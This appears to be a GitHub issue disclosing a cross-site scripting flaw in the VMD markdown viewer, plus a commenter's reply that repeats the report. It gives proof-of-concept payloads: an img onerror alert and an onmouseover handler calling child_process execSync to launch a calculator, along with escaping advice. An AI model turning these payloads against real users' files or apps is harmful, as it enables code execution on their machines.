Hi, I'd like to report a security vulnerability in lastest release :
Description: Cross-site scripting (XSS) vulnerability(also execute constructed malicious code)
Date: 2021.05.17
Version: v1.26.2~v1.34.0
Tested on: Windows10 & Mac
POC
The program does not properly handle the content of the code, causing the program to have a cross-site scripting vulnerability, which can also execute constructed malicious code
creat poc.md file with the following content: <img src=1 onerror=alert(/xss/)>
use vmd.exe to open the poc.md ,the poc code is executed
pop up calc.exe
XSS
the file content code : <img src=1 onerror=alert(/xss/)>
Execute malicious code
the file content code : <a onmouseover="require('child_process').execSync('calc.exe')">POC Link</a>
use vmd.exe open poc.md file to execute malicious code with xss vulnerability:
when vmd.exe open the poc.md file , the poc code parsed in vmd.exe div class="markdown-body" </div>, so it executed:
Use the Poc <a onmouseover="require('child_process').execSync('open -na Calculator')">POC Link</a> on Mac:
How to fix
Use an appropriate escaping/encoding technique depending on where user input is to be used: HTML escape, JavaScript escape, CSS escape, URL escape, etc.
VMD should sanitize the content in order to avoid XSS.
The text was updated successfully, but these errors were encountered:
Hello, notaisy, and the other friends of this project.
Yeah, buddy, I've decided to investigate this case, and yeah, there is have a big problem, only for a stupid example, if someone malicious guy sends md file with malicious content, and for example, the user is a real user ;) and don't know what actually is going on, the game is over for him.
Hi, I'd like to report a security vulnerability in lastest release :
Description: Cross-site scripting (XSS) vulnerability(also execute constructed malicious code)
Date: 2021.05.17
Version: v1.26.2~v1.34.0
Tested on: Windows10 & Mac
POC
The program does not properly handle the content of the code, causing the program to have a cross-site scripting vulnerability, which can also execute constructed malicious code
<img src=1 onerror=alert(/xss/)>XSS
the file content code :
<img src=1 onerror=alert(/xss/)>Execute malicious code
the file content code :
<a onmouseover="require('child_process').execSync('calc.exe')">POC Link</a>use vmd.exe open poc.md file to execute malicious code with xss vulnerability:

when vmd.exe open the poc.md file , the poc code parsed in vmd.exe

div class="markdown-body" </div>, so it executed:Use the Poc
<a onmouseover="require('child_process').execSync('open -na Calculator')">POC Link</a>on Mac:How to fix
The text was updated successfully, but these errors were encountered: